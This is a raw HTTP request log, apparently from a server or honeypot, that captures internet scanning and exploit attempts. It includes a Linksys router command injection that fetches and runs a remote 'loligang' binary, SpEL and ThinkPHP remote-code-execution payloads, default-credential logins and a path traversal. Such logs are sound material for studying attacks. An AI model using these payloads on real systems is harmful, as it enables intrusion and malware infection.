User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
Content-Length: 119
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Body:
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/su")]=&password=&repeatedPassword=
120.204.202.112 - - [11/Sep/2019 18:36:56] "POST /users?page=&size=5 HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
Connection: close
Accept-Encoding: gzip
120.204.202.112 - - [11/Sep/2019 18:36:56] "GET / HTTP/1.1" 200 -
INFO:root:POST request,
Path: /tmUnblock.cgi
Headers:
Host: 127.0.0.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Liquor 1.0
Content-Length: 312
Content-Type: application/x-www-form-urlencoded
Body:
ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+loli%3B+wget+http%3A%2F%2Fardp.hldns.ru%2Floligang.mpsl%3B+chmod+777+loligang.mpsl%3B+.%2Floligang.mpsl+loligang.mpsl.linksys%60&action=&ttcp_num=2&t
tcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
50.209.104.212 - - [11/Sep/2019 19:43:56] "POST /tmUnblock.cgi HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7
Content-Length: 0
91.108.156.233 - - [11/Sep/2019 21:07:34] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Accept-Encoding: identity
Host: 157.245.46.181
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
66.240.205.34 - - [11/Sep/2019 21:51:22] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /robots.txt
Headers:
Host: 157.245.46.181:8080
Accept-Encoding: identity
66.240.205.34 - - [11/Sep/2019 21:51:22] "GET /robots.txt HTTP/1.1" 200 -
INFO:root:GET request,
Path: /sitemap.xml
Headers:
Host: 157.245.46.181:8080
Accept-Encoding: identity
66.240.205.34 - - [11/Sep/2019 21:51:22] "GET /sitemap.xml HTTP/1.1" 200 -
INFO:root:GET request,
Path: /.well-known/security.txt
Headers:
Host: 157.245.46.181:8080
Accept-Encoding: identity
66.240.205.34 - - [11/Sep/2019 21:51:23] "GET /.well-known/security.txt HTTP/1.1" 200 -
INFO:root:GET request,
Path: /favicon.ico
Headers:
Host: 157.245.46.181:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.13.0
66.240.205.34 - - [11/Sep/2019 21:51:23] "GET /favicon.ico HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Length: 0
202.84.77.238 - - [11/Sep/2019 22:39:06] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: */*
Connection: keep-alive
122.228.19.79 - - [11/Sep/2019 22:55:48] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: deflate, gzip, identity
Accept-Language: en-US;q=0.6,en;q=0.4
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
194.61.24.189 - - [11/Sep/2019 23:18:33] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /HNAP1/
Headers:
Host: 157.245.46.181:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: deflate, gzip, identity
Accept-Language: en-US;q=0.6,en;q=0.4
Referer: http://157.245.46.181:8080/
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
194.61.24.189 - - [11/Sep/2019 23:18:33] "GET /HNAP1/ HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0
Accept-Encoding: gzip
Connection: close
139.162.79.87 - - [11/Sep/2019 23:43:53] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181
184.105.139.68 - - [12/Sep/2019 00:02:39] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181
X-Real-IP: 216.218.206.68
X-Forwarded-For: 216.218.206.68
X-Forwarded-Proto: https
Connection: close
127.0.0.1 - - [12/Sep/2019 00:11:30] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Length: 0
86.58.116.43 - - [12/Sep/2019 00:44:06] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /TP/public/index.php
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
Connection: close
Accept-Encoding: gzip
39.135.1.156 - - [12/Sep/2019 01:02:23] "GET /TP/public/index.php HTTP/1.1" 200 -
INFO:root:GET request,
Path: /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
Connection: close
Accept-Encoding: gzip
39.135.1.156 - - [12/Sep/2019 01:02:24] "GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 200 -
INFO:root:POST request,
Path: /TP/public/index.php?s=captcha
Headers:
Host: 157.245.46.181:8080
User-Agent: Go-http-client/1.1
Content-Length: 84
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Body:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=uname&ipconfig
39.135.1.156 - - [12/Sep/2019 01:02:24] "POST /TP/public/index.php?s=captcha HTTP/1.1" 200 -
INFO:root:POST request,
Path: /users?page=&size=5
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
Content-Length: 119
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Body:
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/su")]=&password=&repeatedPassword=
39.135.1.156 - - [12/Sep/2019 01:02:25] "POST /users?page=&size=5 HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
Connection: close
Accept-Encoding: gzip
39.135.1.156 - - [12/Sep/2019 01:02:25] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Length: 0
178.93.18.164 - - [12/Sep/2019 01:56:47] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Length: 0
103.47.219.149 - - [12/Sep/2019 02:14:14] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Length: 0
92.39.54.176 - - [12/Sep/2019 05:11:59] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /admin-scripts.asp
Headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Host: 157.245.46.181
Authorization: Basic YWRtaW46YWRtaW4=
101.132.148.50 - - [12/Sep/2019 07:29:19] "GET /admin-scripts.asp HTTP/1.1" 200 -
INFO:root:GET request,
Path: /admin-scripts.asp
Headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Host: 157.245.46.181
Authorization: Basic cm9vdDphZG1pbg==
101.132.148.50 - - [12/Sep/2019 07:29:20] "GET /admin-scripts.asp HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Length: 0
191.205.92.242 - - [12/Sep/2019 08:03:33] "GET / HTTP/1.1" 200 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
Connection: keep-alive
Accept-Encoding: gzip,deflate
92.119.160.10 - - [12/Sep/2019 08:18:16] "GET / HTTP/1.1" 200 -
113.173.230.35 - - [12/Sep/2019 08:18:32] code 400, message Bad request version ('HTTP')
113.173.230.35 - - [12/Sep/2019 08:18:32] "GET ../../mnt/custom/ProductDefinition HTTP" 400 -
INFO:root:GET request,
Path: /
Headers:
Host: 157.245.46.181:8080
User-Agent: HTTP Banner Detection (https://security.ipip.net)
Connection: close
139.162.111.98 - - [12/Sep/2019 09:21:08] "GET / HTTP/1.1" 200 -
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment